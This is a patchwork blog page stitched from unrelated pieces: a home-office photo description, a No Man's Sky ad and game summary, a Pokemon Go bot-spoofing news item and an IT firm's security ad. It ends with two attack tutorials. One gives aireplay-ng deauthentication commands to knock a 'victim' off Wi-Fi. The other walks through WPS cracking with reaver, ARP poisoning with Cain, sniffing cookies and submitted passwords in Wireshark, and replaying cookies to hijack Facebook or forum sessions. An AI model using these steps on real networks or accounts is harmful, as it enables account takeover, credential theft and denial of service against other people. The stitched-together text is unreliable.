Top 10 Computer Tricks Every Geek Should Know






Locke’s workspace isn’t designer, or super fancy, it looks like a home office any of us would be happy to call our own. But he does have three displays with a No Man’s Sky wallpaper across them, a comfy chair, a mini-fridge, and space to play his guitar and get creative. That’s why we like it.
The photo above is a wide shot of the whole setup, and you can see that mini-wine fridge (which I’m not sure if it’s for wine or other drinks too) at the bottom right, an additional chair and some desk space for guests right next to him, and even more seating on the table to the left of his chair. I particularly like the backlighting behind his monitors, and how it extends under his desk (an area all too often poorly lit) so he can see the guitar pedal down there. You can check out a shot of the lighting and his cable management over at his Flickr page, linked below.
Here’s a closer shot of the desk surface, and that really slick (but now discontinued) Steelseries Merc Stealth Keyboard:
I also imagine that many of you either love or hate the fact that the displays are mounted the way they are (or that the wallpaper isn’t a clean stretch across all of them, and I can understand that.) Also, as someone who used to keep a fan on his desk because the office I worked in was hot as all getout, I appreciate the presence of that Vornado Flippi. Beyond that I dig the mouse cable wrangler there that keeps the mouse cable from getting tangled on other things or too much slack in the way on the desk surface.
Here’s a shot of his desktop, wireless controller, and that guitar pedal, by the way:



Book For Quick Start in Programming HTML,CSS, and JAVASCRIPT For Newbies ! Only For 2.99 $






                                                                  

Buy No Man Sky For 59.99 $ For PS4




No Man's Sky is an upcoming action-adventure survival video game developed and published by the indie studio Hello Games for PlayStation 4 and Microsoft Windows. The game is scheduled to be released worldwide in August 2016.
No Man's Sky's gameplay is built on four pillars—exploration, survival, combat and trading—in which players are free to perform within the entirety of a procedurally generated deterministic open universe, which includes over 18 quintillion(1.8×1019) planets,[a] many with their own set of flora and fauna.[2] By exploring, players gain information about the planets that they can submit to the Atlas, a universal database that can be shared with other players of the game. Players get compensated in in-game currency every time new information is uploaded to The Atlas. Players also gain materials and blueprints to upgrade their character's equipment and purchase a variety of starships, allowing them to travel deeper into the center of the galaxy, survive on planets with hostile environments, interact in friendly or hostile manners to computer-controlled space-faring factions, or trade with other ships. Some activities, such as killing too many lifeforms or draining too many resources from planets, will draw the attention of patrolling robotic Sentinels that will attempt to kill the player-character.
Players participate in a shared universe, with the ability to exchange planet coordinates with friends, though the game will also be fully playable offline; this is enabled by the procedural generation system that assures players will find the same planet with the same features, lifeforms, and other aspects once given the planet coordinates, requiring no further data to be stored or retrieved from game servers. Nearly all elements of the game are procedurally generated, including star systems, planets and their ecosystems, flora, fauna and their behavioral patterns, artificial structures, and alien factions and their spacecraft. The game's engine employs several deterministic algorithms such as parameterised mathematical equations that can mimic a wide range of geometry and structure found in nature. Art elements created by human artists are used and altered as well within these generation systems. The game's audio, including ambient sounds and its underlying soundtrack, also use procedural generation methods from base samples created by Paul Weir and the musical group 65daysofstatic.
No Man's Sky represents Hello Games' vision of a broad, attention-getting game that they wanted to pursue while they secured their financial well being through the Joe Danger series of games.[3] The game's original prototype was worked on by Hello Games' Sean Murray, and then expanded into a small four-person team prior to its first teaser in December 2013. About a dozen developers worked on the game leading up to its release, with Sony Interactive Entertainmentproviding promotional and marketing support. Sony formally announced the title during their press conference at theElectronic Entertainment Expo 2014, the first independently-developed game to be presented at the Expo's centrepiece events.



                                             





                                                                 

'Pokemon Go' Cheats, Tips & Tricks:You Can Actually Use Automatic Bots To Spoof Your GPS




"Pokemon Go" players can now use automatic bots to spoof their GPS, thereby playing the game while users stay indoors. A number of "Pokemon Go" bots are currently available, which offer free trials and an automation tool priced at only a few dollars. Each of these generally work in the same manner by forwarding artificial data to "Pokemon Go" servers and simulating a player who can play for endless hours.


A player's phone is decorated with Pokemon stickers as he plays Pokemon Go, a mobile game that has become a global phenomenon, the day after it's UK release on July 15, 2016 in London, England.
ArsTechnica revealed that the user will initially provide coordinates as a starting point and their "Pokemon Go" account details to for authentication purposes. Next, the bot will start to look for nearby Pokemon and simulate a walk to the closest creature by sending spoofed GPS coordinates to the "Pokemon Go" server at the right time. Once the bot is near a Pokemon, it can use a simple API call to catch the character, and then immediately move on to the next target.

The "Pokemon Go" bots can also do other activities, like trading duplicate Pokemon for resources, gathering new Pokeballs at Pokestops, evolving Pokemon, incubating and hatching eggs and prioritizing Pokemon to catch. Users can set which Pokemon to ignore depending on their current needs and stats.

Based on tests, a "Pokemon Go" bot can earn an average of 50,000 experience points every hour, allowing the user to reach level 15 in less than a day, just by operating in the background. The bot can continue playing nonstop and reach the higher levels of the game in just a few days.

Daily Dot explained that "Pokemon Go" uses GPS location tracking to move players around the virtual game world. However, the GPS can be tricked by enabling Mock Locations in the Android developer options menu and selecting an app to spoof.

Game developer Niantic Games has released some tools that will hopefully stop the "Pokemon Go" bots. Some players may be spawned in the middle of a blank space and find an error stating that their GPS data is unavailable. Fooling the app will require players to change their GPS data without the operating system. This can be done by rooting the device.

Over time, the availability of "Pokemon Go" bots will impact the game, specifically by having the cheaters complete their collection much quicker than their regular counterparts. On the contrary, they are also depriving themselves of exercise and the fun that the "Pokemon Go" creators intended in the first place.

Video Tuts:

Tips for Keeping your Small Business Secure from Hackers





As business is increasingly done online, and more important information stored digitally, the risk and potential damage of cyber attack increase. Your website might be taken down, e-mail, client, employee, and credit card information all might be stolen, or erased. Any of the above can damage your business serious damage. Rather then seeking to repair such damage after the fact, it’s best to do all that you can to prevent it. That’s why Working Nets, Inc. Is here with a guide to help you improve your businesses cyber security.

Ensure you Employees are Trained in Cyber Security:
Make sure you and your employees know safe practices to protect your companies equipment, digital assets, and information. Require strong passwords consisting of uppercase letters, lowercase letters, numbers and symbols over nine characters long. Institute strict rules for employees defining what acceptable internet use is, and what is not. Establish and adhere to penalties for practices that violate your cyber security rules. Ensure that your employees also know how to keep customer information safe.  Without the proper cyber security training, your employees represent the greatest risk to your business, with it, they are its greatest defense.

Keep your Network and Machines Protected:

Employees trained in cyber security reduce the risk of your business being the victim of cyber attacks. However, even if you reduce the risk, there’s still a chance that a cyber attack can happen. That’s why it’s important to make sure all the devices in your office have security software, your network has firewall protection, and that it’s all up to date.

Install anti-malware and anti-virus programs on your company computers. Make sure mobile devices, such as smart phones, have cyber security apps and that your employees know safe practices for using their devices. Have two wireless networks, one for employees and one for customers, and make sure all of your networks are firewall protected.

No cyber security program, operating system, or firewall is perfect. Hackers are constantly looking for exploits in these systems so that they can break into cyber systems.  As hackers look for exploits, cyber security specialists are doing their best to find them and fix them first. That’s why it’s essential that all of your machines and their security programs stay up to date.

Protect Your Business With Working Nets:
Contact Working Nets. We know that handling the cyber security for a business while actually keeping that business running can seem impossible. Outsourcing your IT can give you peace of mind and allow you to take care of the things that are important for your company. Working Nets is a Maryland based IT Service and Security company that services small businesses nationwide. We’re always on top of emerging cyber security trends and threats so you don’t have to be.

To talk to someone about managed IT for your business, give us a call at (443) 992-7394. We’d be happy to assist you with your professional business networking needs.

Kick People Off Your Internet



Step 1




STEP 1

Airmon-Ng

open up a terminal and type airmon-ng start wlan0 (or eth0 if your using Ethernet.) (Some times you might have to type airmon-ng check kill)

STEP 2 

Airodump-Ng

Next type airodump-ng wlan0 then find your Internet copy its bssid then type airodump-ng --bssid (your bssid) wlan0. It will show your victims mac.



STEP 3
Aireplay-Ng
Now if you know their IP address you don't need to use airodump-ng.
If you know their ip address you can type aireplay-ng --deauth 0 -a (networks bssid) -k (Their ip address)
If your going to use their mac address type this aireplay-ng --deauth 0 -a (networks bssid) -c (Their mac address)
The 0 in Deauth 0 means keep deauth them until you stop it with CTRL C.
Hope you enjoyed this tutorial if you need help just comment whats wrong and I will get back to you as fast as possible.


Hack Facebook Account By Cookie Stealing And Session Hijacking Wiith Wireshark 2016




Hack Facebook Account By Cookie Stealing And Session Hijacking Wiith Wireshark
Wireshark Software to capture cookies:
Wireshark is the best free packet sniffer software available today. Actually, it was developed for making a network secure. But, the same software is now used by hackers to test for vulnerability and security loopholes in the network and to attack the network accordingly. Cookie stealing being one of the types of hacks implemented using this Wireshark software.
Requirements:
Cain and Abel : http://www.oxid.it/cain.html
Wireshark : http://www.wireshark.org/
Firefox 3 (or one compatable with add n edit) : http://www.oldapps.com/firefox.php?old_firefox=59
Add n Edit (cookie editor for firefox) : https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies/
Acess to the network with user you want to hack
Network traffic
Prerequisites: Download and install all above programs. To add “Add n Edit” to your browser just open firefox, go to tools, then click add-ons. you can drag and drop the program from wherever you saved it into the little box that popped up and install it from there.
Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.

First: Gain acess to the Network. Open networks or your own network would be easy but if you have a specific slave you want you should be able to gain acess using Backtrack.
Tip: use reaver to exploit WPS for WPA/WPA2 encryptions, WEPs are easy to crack given time and OPN means there is no password.
Second: Right click Cain and choose ‘run as administrator.’ on the top bar go to ‘configure’ and be sure to select your wireless card/adapter. now click where it says ‘Sniffer’ then this litte button towards the top left:
2c516-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
Next click any empty white box then the blue “+” symbol near the button you pressed just before. choose okay
should look like this:
23534-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
These are all the devices it was able to detect.
Now we go to APR on the bottom bar. Once again click any empty white box then the blue cross. It’s easiest to just go one by one and choose all possibilities.
3b606-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
Now we have to poison them so we choose the little yellow hazard symbol towards the top left. should now look like this:
b9b36-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
we are done here, just minimize Cain for now.
Third: Run wireshark as administrator. On the top bar choose ‘Capture’ then ‘Interfaces.’ Here you will have to choose your interface that is connected to the Network we are sniffing from. if you wait a few seconds you might see some traffic being collected as seen in my photo, just choose that interface b/c thats most likely it.
b46a1-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
Wireshark will list and color-code all the traffic it sees for you. To make this simpler we can use the filter to only see the traffic we want, Type “http.cookie” in the filter. (Something to consider is to just filter to “http” and scroll through the entries looking for ones that start with the word “POST” this means that information was submitted to the webpage noted such as a username and a password! so if you see this just look through the details and you should see the info you want, most passwords will be hashed but use this site to decript them:http://www.md5decrypter.co.uk/ )

Here is an image:
b1dc4-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
You can either look through this information manually or use the search function to find what you want. In my case i want to hijack the session of a user on the forumfreerainbowtables.com so i will use the search function (press Ctrl+F, or go to edit -> search) and type in the information i know for sure will be in the entry. if your hijacking someones facebook put ‘facebook’ there. Most of the time to be safe i do not use the first entry i see b/c this will only work if the person is auto logged in, so just go down a few more until you see one you think will work (just use common sense).
a9806-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
What we need are the cookies. Here are what mine look like and how to get there. With practice you will be able to tell which cookies are used for logins and be able to limit failed attempts.
ed87e-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
Copy the cookies as value and save them into a notepad (shown in pic above). I would suggest to seperate everywhere you see a “;” bc this suggests that is the begining of the next entry. The text to the left of the = is the name of the cookie and the text to the right is its value.
Final: Open up your firefox browser with Add n Edit enabled. You can get to your add ons by going to tools and they should all be listed in the drop down tab. First go to the website you are hijjacking the session from then open your cookie editor. Should look something like this:
cd34b-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
The last thing to do is to change your cookies to match the ones you captured. If the cookies given to you by the site expire (like the ones in my picture do) you will have to delete them and add all the ones we captured earlier in. if they do not expire you can just edit them. Bottom line is all the cookies must match the cookies you captures in the earlier steps EXACTLY! Make sure you do not add any extras and that you did not miss anything. Also all fields must be filled in (Path and Domain as well as Name and Value). My path is “/” and my domain is “.freerainbowtables.com
mine looks like this:
b645b-facebook2bhacking2busing2bcookies2bstealing2bwildhacker
You are now done, Just close the cookie editor and reload the webpage. If done correctly with the correct cookies you should be logged in as the user you attacked!